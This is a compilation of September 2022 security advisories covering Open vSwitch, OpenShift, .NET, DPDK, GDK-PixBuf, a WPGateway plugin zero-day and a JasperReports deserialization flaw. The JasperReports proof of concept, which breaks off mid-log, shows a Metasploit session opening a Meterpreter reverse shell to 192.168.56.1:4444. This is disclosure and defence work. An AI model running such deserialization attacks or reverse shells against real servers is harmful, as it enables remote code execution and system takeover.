Red Hat Security Advisory 2022-6505-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: openvswitch2.15 security update  
Advisory ID:       RHSA-2022:6505-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6505  
Issue date:        2022-09-13  
CVE Names:         CVE-2022-28199  
====================================================================  
1. Summary:

An update for openvswitch2.15 is now available in Fast Datapath for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 8 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* dpdk: error recovery in mlx5 driver not handled properly, allowing for  
denial of service (CVE-2022-28199)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2123549 - CVE-2022-28199 dpdk: error recovery in mlx5 driver not handled properly, allowing for denial of service

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 8:

Source:  
openvswitch2.15-2.15.0-113.3.el8fdp.src.rpm

aarch64:  
network-scripts-openvswitch2.15-2.15.0-113.3.el8fdp.aarch64.rpm  
openvswitch2.15-2.15.0-113.3.el8fdp.aarch64.rpm  
openvswitch2.15-debuginfo-2.15.0-113.3.el8fdp.aarch64.rpm  
openvswitch2.15-debugsource-2.15.0-113.3.el8fdp.aarch64.rpm  
openvswitch2.15-devel-2.15.0-113.3.el8fdp.aarch64.rpm  
openvswitch2.15-ipsec-2.15.0-113.3.el8fdp.aarch64.rpm  
python3-openvswitch2.15-2.15.0-113.3.el8fdp.aarch64.rpm  
python3-openvswitch2.15-debuginfo-2.15.0-113.3.el8fdp.aarch64.rpm

noarch:  
openvswitch2.15-test-2.15.0-113.3.el8fdp.noarch.rpm

ppc64le:  
network-scripts-openvswitch2.15-2.15.0-113.3.el8fdp.ppc64le.rpm  
openvswitch2.15-2.15.0-113.3.el8fdp.ppc64le.rpm  
openvswitch2.15-debuginfo-2.15.0-113.3.el8fdp.ppc64le.rpm  
openvswitch2.15-debugsource-2.15.0-113.3.el8fdp.ppc64le.rpm  
openvswitch2.15-devel-2.15.0-113.3.el8fdp.ppc64le.rpm  
openvswitch2.15-ipsec-2.15.0-113.3.el8fdp.ppc64le.rpm  
python3-openvswitch2.15-2.15.0-113.3.el8fdp.ppc64le.rpm  
python3-openvswitch2.15-debuginfo-2.15.0-113.3.el8fdp.ppc64le.rpm

s390x:  
network-scripts-openvswitch2.15-2.15.0-113.3.el8fdp.s390x.rpm  
openvswitch2.15-2.15.0-113.3.el8fdp.s390x.rpm  
openvswitch2.15-debuginfo-2.15.0-113.3.el8fdp.s390x.rpm  
openvswitch2.15-debugsource-2.15.0-113.3.el8fdp.s390x.rpm  
openvswitch2.15-devel-2.15.0-113.3.el8fdp.s390x.rpm  
openvswitch2.15-ipsec-2.15.0-113.3.el8fdp.s390x.rpm  
python3-openvswitch2.15-2.15.0-113.3.el8fdp.s390x.rpm  
python3-openvswitch2.15-debuginfo-2.15.0-113.3.el8fdp.s390x.rpm

x86_64:  
network-scripts-openvswitch2.15-2.15.0-113.3.el8fdp.x86_64.rpm  
openvswitch2.15-2.15.0-113.3.el8fdp.x86_64.rpm  
openvswitch2.15-debuginfo-2.15.0-113.3.el8fdp.x86_64.rpm  
openvswitch2.15-debugsource-2.15.0-113.3.el8fdp.x86_64.rpm  
openvswitch2.15-devel-2.15.0-113.3.el8fdp.x86_64.rpm  
openvswitch2.15-ipsec-2.15.0-113.3.el8fdp.x86_64.rpm  
python3-openvswitch2.15-2.15.0-113.3.el8fdp.x86_64.rpm  
python3-openvswitch2.15-debuginfo-2.15.0-113.3.el8fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-28199  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyEqktzjgjWX9erEAQhiTw//U7hzly0a3xVXw+cW2G0tnHu2BSibf/9n  
Usl6g2bjcU6e+k00aih/Fz9npyPVlbO8rXjhi4SHnKtykDirC4fekEcT+7z+oIsq  
CqIdpede8yDgOG7YXpSPMG8BpAJHcPU2YsF1ZJgizvn5gTCZ7CU9IPhkqttPD/l3  
GgKixnXrhaZh38XE+vdHbj81RXGKT/uFx5GVp7PunLOdPPdUiMzY/b4JzYEeDU5l  
PyVrMP5Q4OU4iIhHiPMDCJ2S30pxFhH6wkcr0TPTe3pHjaYgvlLwIxFqL4/CVHi+  
uZN+fsDhTfQCXhKKXc6jn+ogt7b+s+dzOX9/qaULSRzUoOdxrW6Hxg9QbBU+R8fS  
x0Ie8XCF9wku3bj9NMkph4VbESgnzVHI64ri4zQKRD4R4C3Rvqhh7qmRYYPHAZ/5  
i8Ok+1HgZIW97RNW8YmdaJnVIM3MBE7jiC6EzCQF1WVjmW/OO8i3O0sZd3troCL0  
FGcE9wmyOI+9gwOZ+1aafxDlXjVdunMwBIHvGjE/BxCtY4MeT7j1VdwbvTXgsZIQ  
CgCTYvZfLfYckSTV8Jsf9Nw+79WKx/KD9Cz2tJSdFGqgmirgyITKDDuUK1ZxAAhO  
yXvsGWN2NcUhqjq9+aePwT+y8KA/OvzItIU1+o8Ty5ya8MGHddB4MwGk8seOsinE  
zbVZ+vYiNPw=ScRD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6505-01

Red Hat Security Advisory 2022-6506-01 - Open vSwitch provides standard network bridging functions and support for the OpenFlow protocol for remote per-flow control of traffic. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: openvswitch2.16 security update  
Advisory ID:       RHSA-2022:6506-01  
Product:           Fast Datapath  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6506  
Issue date:        2022-09-13  
CVE Names:         CVE-2022-28199  
====================================================================  
1. Summary:

An update for openvswitch2.13 is now available for Fast Datapath for Red  
Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Fast Datapath for Red Hat Enterprise Linux 8 - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Open vSwitch provides standard network bridging functions and support for  
the OpenFlow protocol for remote per-flow control of traffic.

Security Fix(es):

* dpdk: error recovery in mlx5 driver not handled properly, allowing for  
denial of service (CVE-2022-28199)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2123549 - CVE-2022-28199 dpdk: error recovery in mlx5 driver not handled properly, allowing for denial of service

6. Package List:

Fast Datapath for Red Hat Enterprise Linux 8:

Source:  
openvswitch2.16-2.16.0-89.3.el8fdp.src.rpm

aarch64:  
network-scripts-openvswitch2.16-2.16.0-89.3.el8fdp.aarch64.rpm  
openvswitch2.16-2.16.0-89.3.el8fdp.aarch64.rpm  
openvswitch2.16-debuginfo-2.16.0-89.3.el8fdp.aarch64.rpm  
openvswitch2.16-debugsource-2.16.0-89.3.el8fdp.aarch64.rpm  
openvswitch2.16-devel-2.16.0-89.3.el8fdp.aarch64.rpm  
openvswitch2.16-ipsec-2.16.0-89.3.el8fdp.aarch64.rpm  
python3-openvswitch2.16-2.16.0-89.3.el8fdp.aarch64.rpm  
python3-openvswitch2.16-debuginfo-2.16.0-89.3.el8fdp.aarch64.rpm

noarch:  
openvswitch2.16-test-2.16.0-89.3.el8fdp.noarch.rpm

ppc64le:  
network-scripts-openvswitch2.16-2.16.0-89.3.el8fdp.ppc64le.rpm  
openvswitch2.16-2.16.0-89.3.el8fdp.ppc64le.rpm  
openvswitch2.16-debuginfo-2.16.0-89.3.el8fdp.ppc64le.rpm  
openvswitch2.16-debugsource-2.16.0-89.3.el8fdp.ppc64le.rpm  
openvswitch2.16-devel-2.16.0-89.3.el8fdp.ppc64le.rpm  
openvswitch2.16-ipsec-2.16.0-89.3.el8fdp.ppc64le.rpm  
python3-openvswitch2.16-2.16.0-89.3.el8fdp.ppc64le.rpm  
python3-openvswitch2.16-debuginfo-2.16.0-89.3.el8fdp.ppc64le.rpm

s390x:  
network-scripts-openvswitch2.16-2.16.0-89.3.el8fdp.s390x.rpm  
openvswitch2.16-2.16.0-89.3.el8fdp.s390x.rpm  
openvswitch2.16-debuginfo-2.16.0-89.3.el8fdp.s390x.rpm  
openvswitch2.16-debugsource-2.16.0-89.3.el8fdp.s390x.rpm  
openvswitch2.16-devel-2.16.0-89.3.el8fdp.s390x.rpm  
openvswitch2.16-ipsec-2.16.0-89.3.el8fdp.s390x.rpm  
python3-openvswitch2.16-2.16.0-89.3.el8fdp.s390x.rpm  
python3-openvswitch2.16-debuginfo-2.16.0-89.3.el8fdp.s390x.rpm

x86_64:  
network-scripts-openvswitch2.16-2.16.0-89.3.el8fdp.x86_64.rpm  
openvswitch2.16-2.16.0-89.3.el8fdp.x86_64.rpm  
openvswitch2.16-debuginfo-2.16.0-89.3.el8fdp.x86_64.rpm  
openvswitch2.16-debugsource-2.16.0-89.3.el8fdp.x86_64.rpm  
openvswitch2.16-devel-2.16.0-89.3.el8fdp.x86_64.rpm  
openvswitch2.16-ipsec-2.16.0-89.3.el8fdp.x86_64.rpm  
python3-openvswitch2.16-2.16.0-89.3.el8fdp.x86_64.rpm  
python3-openvswitch2.16-debuginfo-2.16.0-89.3.el8fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-28199  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyEqjdzjgjWX9erEAQhE3Q//bp1gswIwxUqofEcVwBVaZknVih4w/zUe  
0suuFF3XyXCuYgPbN6jQWtWFfYjmMHpZ7zprc9gDSDN/LyJWkCQhk3iC8ZJSu0HN  
UVOEt7neLIYeFmJLoct7hfJl9E9aky6huqXW5SPLW7XWhYUVpBFbsVeH/FbZAOJs  
mgLYsIa1rYvaciIXB0D6k9f8Dgzk/uRCgCwKNnrH3EtoMDCF1bnkYHcl49kvm27c  
SdAVkL3M8qrNnuvPXiVPqPUKZZJti/M0dGTbXjK9KzMTP330GW7OYqj7c+KaBKS/  
9UMHbOqKyxjbq82XJwO9zcrxv2PClynitfS1oCDuVk+3G3iQu27XEqdnyfT4+glZ  
C85mwSjWPLaOL0Sf7FEmsolGd5qgZJ7hDqrPL2ZU4mnFHzi/viEQSBKV9xj3Q3Tl  
BfTo5Ka1f/I/aWdRSbx6RY7w6iJDfj4WRMTDbxAhtBRKrkat88gMRVtcxFAvwsxi  
qTrYz+E1bVY/1Gg8oc9+s3JmrdWGQaoYgAMwiPYQlqHOT23z6nKMaTkg4J/yG1y8  
Oxb9cDC3nvra8OlwAFS/Q7JHooxFvBOTJHmV8jpuzs7BBsIVS4z0yqB4YjOhDsmq  
WAFlB8Yx05E5wxY6QzNGZvfjgfzO25RUP8gptBiSUK1uyYwsULY6U3kA8+depklX  
39Cf5SJEuZY=w94+  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6506-01

Ubuntu Security Notice 5609-1 - Graham Esau discovered that .NET 6 incorrectly parsed certain payloads during model binding. An attacker could possibly use this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5609-1September 13, 2022dotnet6 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:.NET 6 could be made to crash if it parsed a specially crafted file.Software Description:- dotnet6: dotNET CLI tools and runtimeDetails:Graham Esau discovered that .NET 6 incorrectly parsed certain payloadsduring model binding. An attacker could possibly use this issue tocause a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   aspnetcore-runtime-6.0          6.0.109-0ubuntu1~22.04.1   dotnet-host                             6.0.109-0ubuntu1~22.04.1   dotnet-hostfxr-6.0                   6.0.109-0ubuntu1~22.04.1   dotnet-runtime-6.0                  6.0.109-0ubuntu1~22.04.1   dotnet-sdk-6.0                        6.0.109-0ubuntu1~22.04.1   dotnet6                                   6.0.109-0ubuntu1~22.04.1In general, a standard system update will make all the necessary changes. A restart may be required after the update if any affected files are being used.References:   https://ubuntu.com/security/notices/USN-5609-1   CVE-2022-38013Package Information:   https://launchpad.net/ubuntu/+source/dotnet6/6.0.109-0ubuntu1~22.04.1

Ubuntu Security Notice USN-5609-1

Red Hat Security Advisory 2022-6322-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.7.59. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.7.59 bug fix and security update  
Advisory ID:       RHSA-2022:6322-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6322  
Issue date:        2022-09-13  
CVE Names:         CVE-2021-39226 CVE-2022-0494 CVE-2022-1353  
                   CVE-2022-2526 CVE-2022-29154  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.7.59 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.7.59. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHBA-2022:6321

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html

Security Fix(es):

* grafana: Snapshot authentication bypass (CVE-2021-39226)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

You may download the oc tool and use it to inspect release image metadata  
as follows:

(For x86_64 architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.7.59-x86_64

The image digest is  
sha256:5db88217bbc9ee12d95f3c740eb0217668628e2f1f61b9cb2afdddf16ffb1333

(For s390x architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.7.59-s390x

The image digest is  
sha256:173203569ce6f5c0c0cd76824a8cd6182f3488ba5e0621559ef8430b40abaa3f

(For ppc64le architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.7.59-ppc64le

The image digest is  
sha256:351d809f8b29d8a7990092f84442f2f77594e5888b851c0c096d21097dd7c451

All OpenShift Container Platform 4.7 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.7 see the following documentation, which  
will be updated shortly for this release, for important instructions on how  
to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

1969870 - virt-launcher pod stuck in Init:0/1 status: error adding container to network "bigip1ens4f0vf2": SRIOV-CNI failed to load netconf: LoadConf(): VF pci addr is required  
1994486 - couldn't find ipfamilies for headless service  
2011063 - CVE-2021-39226 grafana: Snapshot authentication bypass  
2113999 - NetworkManager didn't automatically renew the lease on the VLAN interface configured using nmstate  
2117078 - [4.7z] WebScale: duplicate ecmp next hop error caused by multiple of the same gateway IPs in ovnkube cache  
2117347 - ClusterVersion history pruner does not always retain initial completed update entry

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-875 - Placeholder bug for OCP 4.7.0 image release

6. References:

https://access.redhat.com/security/cve/CVE-2021-39226  
https://access.redhat.com/security/cve/CVE-2022-0494  
https://access.redhat.com/security/cve/CVE-2022-1353  
https://access.redhat.com/security/cve/CVE-2022-2526  
https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyDWJdzjgjWX9erEAQiTjA/+ORj2PxsRj/BJAt7ATSASyYuWqbDgEU6k  
0KqZyqSp366YTg26w6OY94ZuZE1WGjCQed8AZCjZZF7BbjQpV8sdxa2VUqb31N9f  
u5QYkyAyTZsp4gh5OONGzmSwYbC7ABjWJPPII3kLatWuHrGLwoRusbo1xcZ5hfKz  
7jp/FPswHCb8eE9HjEJWKsy6WnvZnn5QMbNsyGKu2HaAuHz0fwKFnmryaomewI7E  
VmhjbRunprIL3l3U2v4adhKSvAD3xbtHwn8EgBzW2fcHxoeP+WluZaaEyVq8QFx9  
q9gXLNdyWhaZxX4VmTzWks4VVUvMTp9jDdGeQK6LueKlHySSCTvmx9b85IF4jdpe  
7CQPIhx9L3WEQCTTzeendfl7tDd3khZ42FStXL9YnAJSM4LZ1NQOZdT/GJSADFg5  
xbTa+M5drPl4ZPSFXi7lq/2O0NZpN2n8YGglzT8hR1+hdbAR5WaWeJ1SS2tJDPGr  
jSgkwVXYF99aJWibA77tZh0CuG34lFaqpJlJTqz/vv+8SgV/9EyXoGHE4RrkItEn  
0IK9VfXKPuMi1tZik8f2UNr7MkzbQAsZCZjVN/dJtx589hDZe0iiOg0O6tL9d3Um  
L2TwMD4vbkuvZbjTjrYTu7tEdJ9PgixJfdycFP+NxywmMk3cXq0E8H1pQF+DWgdc  
GnezIGAosy0=/SM6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6322-01

Ubuntu Security Notice 5608-1 - It was discovered that DPDK incorrectly handled certain Vhost headers. A remote attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5608-1  
September 13, 2022

dpdk vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

DPDK could be made to stop responding if it received specially crafted  
network traffic.

Software Description:  
- dpdk: set of libraries for fast packet processing

Details:

It was discovered that DPDK incorrectly handled certain Vhost headers. A  
remote attacker could possibly use this issue to cause a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  dpdk                            21.11.2-0ubuntu0.22.04.1

Ubuntu 20.04 LTS:  
  dpdk                            19.11.13-0ubuntu0.20.04.1

Ubuntu 18.04 LTS:  
  dpdk                            17.11.10-0ubuntu0.2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5608-1  
  CVE-2022-2132

Package Information:  
  https://launchpad.net/ubuntu/+source/dpdk/21.11.2-0ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/dpdk/19.11.13-0ubuntu0.20.04.1  
  https://launchpad.net/ubuntu/+source/dpdk/17.11.10-0ubuntu0.2

Ubuntu Security Notice USN-5608-1

Ubuntu Security Notice 5607-1 - It was discovered that GDK-PixBuf incorrectly handled certain images. An attacker could possibly use this issue to execute arbitrary code or cause a crash.

=========================================================================  
Ubuntu Security Notice USN-5607-1  
September 13, 2022

gdk-pixbuf vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

GDK-PixBuf could be made do execute arbitrary code or  
crash if it received a specially crafted image.

Software Description:  
- gdk-pixbuf: GDK Pixbuf library

Details:

It was discovered that GDK-PixBuf incorrectly handled certain images.  
An attacker could possibly use this issue to execute arbitrary code  
or cause a crash.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  libgdk-pixbuf-2.0-0             2.42.8+dfsg-1ubuntu0.1

Ubuntu 20.04 LTS:  
  libgdk-pixbuf2.0-0              2.40.0+dfsg-3ubuntu0.4

After a standard system update you need to restart your session to make all  
the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5607-1  
  CVE-2021-44648

Package Information:  
  https://launchpad.net/ubuntu/+source/gdk-pixbuf/2.42.8+dfsg-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/gdk-pixbuf/2.40.0+dfsg-3ubuntu0.4

Ubuntu Security Notice USN-5607-1

WordPress WPGateway plugin versions 3.5 and below suffer from an unauthenticated privilege escalation vulnerability.

    Description: Unauthenticated Privilege EscalationAffected Plugin: WPGatewayPlugin Slug: wpgatewayPlugin Developer: Jack Hopman/WPGatewayAffected Versions: <= 3.5CVE ID: CVE-2022-3180CVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HFully Patched Version: N/AThe WPGateway plugin is a premium plugin tied to the WPGateway cloud service, which offers its users a way to setup and manage WordPress sites from a single dashboard. Part of the plugin functionality exposes a vulnerability that allows unauthenticated attackers to insert a malicious administrator.We obtained a current copy of the plugin on September 9, 2022, and determined that it is vulnerable, at which time we contacted the plugin vendor with our initial disclosure. We have reserved vulnerability identifier CVE-2022-3180 for this issue.As this is an actively exploited zero-day vulnerability, and attackers are already aware of the mechanism required to exploit it, we are releasing this public service announcement (PSA) to all of our users. We are intentionally withholding certain details to prevent further exploitation. As a reminder, an attacker with administrator privileges has effectively achieved a complete site takeover.Indicators of compromiseIf you are working to determine whether a site has been compromised using this vulnerability, the most common indicator of compromise is a malicious administrator with the username of rangex.If you see this user added to your dashboard, it means that your site has been compromised.Additionally, you can check your site’s access logs for requests to //wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1If these requests are present in your logs, they indicate that your site has been attacked using an exploit targeting this vulnerability, but do not necessarily indicate that it has been successfully compromised.ConclusionIn today’s post, we detailed a zero-day vulnerability being actively exploited in the WPGateway plugin.Wordfence Premium, Wordfence Care, and Wordfence Response customers received a firewall rule on September 8, 2022, protecting against this vulnerability, while sites still using the free version of Wordfence will receive the same protection 30 days later, on October 8, 2022.If you have the WPGateway plugin installed, we urge you to remove it immediately until a patch is made available and to check for malicious administrator users in your WordPress dashboard.If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected, as this is a serious vulnerability that is actively being exploited in the wild. Please help make the WordPress community aware of this issue.If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.Our investigation is ongoing, and we will provide more information in an additional blog post when it becomes available.Special thanks to Threat Intelligence Lead Chloe Chamberland for spotting this exploit in the wild.

WordPress WPGateway 3.5 Privilege Escalation

Due to JMX/RMI services in TIBCO JasperReports Server version 8.0.2 Community Edition performing unsafe deserialization, it is possible to execute arbitrary code and system commands on the server system.

Advisory ID:               SYSS-2022-041  
Product:                   JasperReports Server  
Manufacturer:              TIBCO Software Inc.  
Tested Version(s):         8.0.2 Community Edition  
Vulnerability Type:        CWE-502: Deserialization of Untrusted Data  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2022-06-10  
Solution Date:             2022-08-10  
Public Disclosure:         2022-09-09  
CVE Reference:             None assigned  
Author of Advisory:        Moritz Bechler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The manufacturer describes the product as follows (see [1]):

"TIBCO JasperReports(R) Server is a stand-alone and embeddable  
reporting server. It provides reporting and analytics that can  
be embedded into a web or mobile application as well as operate  
as a central information hub for the enterprise by delivering  
mission critical information on a real-time or scheduled basis  
to the browser, mobile device, or email inbox in a variety of  
file formats."

Due to JMX/RMI services performing unsafe deserialization, it is  
possible to execute arbitrary code and system commands on the  
server system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The JasperReports Server web application spawns a non-standard JMX  
diagnostic server exposed under the RMI name "jasperserver". The relevant  
configuration is found in WEB-INF/js.diagnostic.properties:  
------  
#Diagnostic default remote access configuration  
diagnostic.usePlatformJMXServer = false  
diagnostic.port = 10990  
diagnostic.name = jasperserver  
diagnostic.rmiHost = localhost  
------

It is also found in WEB-INF/applicationContext-diagnostic.xml:  
------  
  
<bean id="jasperJMXServerConnector" class="org.springframework.jmx.support.ConnectorServerFactoryBean" lazy-init="false">  
    <property name="server" ref="jasperJMXServer"/>  
    <property name="objectName" value="connector:name=rmi"/>  
    <property name="serviceUrl" value="service:jmx:rmi:///jndi/rmi://${diagnostic.rmiHost}:${diagnostic.port}/${diagnostic.name}"/>  
    <property name="environmentMap">  
        <map>  
            <entry key="jmx.remote.authenticator" value-ref="jMXAuthenticator"/>  
        </map>  
    </property>  
</bean>  
------

While the hostname for the RMI bind is specified as localhost, this does,  
in fact, not set the bind address and both the registry and the  
(random) object port are reachable over the network. Only the returned  
reference address is broken, as it points to the local address, but  
this can be adjusted for exploitation.

And while various security patches have implemented type restrictions  
for the fundamental RMI services (DGC, Registry) and the JMX authentication,  
the latter is not applied in this case. It is only active if the following  
property is set: "jmx.remote.rmi.server.credential.types".

For a regular JMX server, this is configured by the standard  
library's JMX ConnectorBootstrap; however, this is not the case for the custom  
JMX server created through Spring's ConnectorServerFactoryBean.

Therefore, the RMIServer.newClient endpoint performs unrestricted,  
unsafe deserialization and can be exploited using one of the known,  
published gadget chains (e.g. from ysoserial[5]) in one of the libraries  
bundled by the server. These allow for execution of arbitrary bytecode and/or  
system commands on the server.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

JasperReports Server (CE) was installed according to the documentation[4]  
on a Debian 11 system running Tomcat 9.0.43-2~deb11u3 and OpenJDK 11.0.15.

After the successful initial setup, a new RMI service can be observed on TCP  
port 10990:

------  
PORT      STATE SERVICE  VERSION  
10990/tcp open  java-rmi Java RMI  
| rmi-dumpregistry:  
|   jasperserver  
|     javax.management.remote.rmi.RMIServerImpl_Stub  
|     @127.0.1.1:39297  
|     extends  
|       java.rmi.server.RemoteStub  
|       extends  
|_        java.rmi.server.RemoteObject  
------

Using a custom Metasploit module, calls on the exposed RMI object can  
be made (calling JMX's RMIServer.newClient(Object creds)). The module  
is capable of identifying known exploitable types on the remote classpath  
and sending malicious crafted objects. These, when deserialized by the remote  
RMI server, spawn a Java Meterpreter instance and open a reverse shell.

------  
msf6 exploit(multi/java/rmi_server) >  
[*] Started reverse TCP handler on 192.168.56.1:4444  
[*] payload/java/classfile/meterpreter/reverse_tcp  
[*] Trying bytecode execution  
[*] Found RMI Registry with 1 registered objects  
[+] Registry lookup() name argument is filtered  
[*] Bind access check before deserialization  
[*] DGC found  
[+] DGC filters parameter types  
[*] Found 1 referenced objects, following references  
[*] Custom object found jasperserver  
[*] Trying with original host 192.168.56.106 port 39297  
[*] Method/interface hash -1089742558549201240 method id -1  
[*] Initial test returned error java.lang.SecurityException  
[-] Incompatible commons-fileupload  
[*] Identified 1 attack vector(s), gadgets ["hashdos", "beanutils",  
  "hibernate", "hibernate-validator", "spring-typeprov", "spring-jta", "rhino"]  
[*] Skipping gadget hashdos based on config  
[*] Sending stage (53921 bytes) to 192.168.56.106  
[...]  
[*] Waiting for exploit to complete...  
[*] Have session...  
[*] Server stopped.  
